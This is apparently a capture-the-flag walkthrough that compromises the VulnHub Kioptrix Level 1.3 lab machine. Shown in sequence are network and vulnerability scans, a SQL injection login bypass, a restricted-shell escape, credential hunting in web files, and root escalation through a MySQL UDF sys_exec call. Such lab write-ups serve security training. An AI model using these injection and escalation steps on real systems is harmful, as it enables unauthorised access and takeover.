VulnHub: Kioptrix: Level 1.3 (#4)

Link: https://www.vulnhub.com/entry/kioptrix-level-13-4,25

  1. Network Discovery
nmap -sn 10.0.2.24/24

The machine ‘10.0.2.9’ is the target.

2. Port scan

nmap -Pn 10.0.2.9nmap -Pn -p1000- 10.0.2.9

There’re 4 ports: 22, 80, 139, 445.

3. OS and service scan

nmap -p 22,80,139,445 -A 10.0.2.9

4. Vuln scan

nmap -p 22,80,139,445 --script vuln 10.0.2.9

5. Nikto scan

nikto -h http://10.0.2.9

6. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.9

7. Access HTTP on port 80

View page source

Access directories

I found username and password from database.sql.

Try supplying in the form

username: johnpassword: 1234

Failed!!!

8. I’ll try SQL injection

Username - ' or '1'='1
Password - ' or '1'='1

Another try w/ john

Username - john
Password - ' or '1'='1

Now, I have a username and password.

9. Access via SSH

ssh john@10.0.2.9MyNameIsJohn

Type ? to get what command I can use.

?

I need TTY shell.

echo os.system('/bin/bash')

Verify

whoamipwdls -la

10. Data hunting and exploitation

cat /etc/passwd

There’re 3 users.

Verify passwd permission

ls -la /etc/passwd

It’s belong to root.

Verify shadow permission

ls -la /etc/shadow

It’s belong to root.

cd /home/loneferretls -la

Not much useful

cd /home/robertls -la

Not much useful

Since I know that the HTTP site is connected w/ MySQL, I assumed that there must be username and password somewhere

I found them in /var/www/checklogin.php

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

Cron job

cat /etc/crontab

Running service

ps aux | grep "^root"

There’s an MySQL and I have its username and password.

Verify version

mysql --version

I can use UDF.

Verify gcc for further compling

which gcc

I don't have gcc.

Maybe there’s a udf file in the system, search it.

find / 2>>/dev/null | grep -i "udf"

Connect to mysql

mysql -u root -p

I will modify the current user, john, to be run any sudo command.

use mysql;select sys_exec('usermod -a -G admin john');exit

Verify

sudo -l

Change to root

sudo su -

Now I’m root.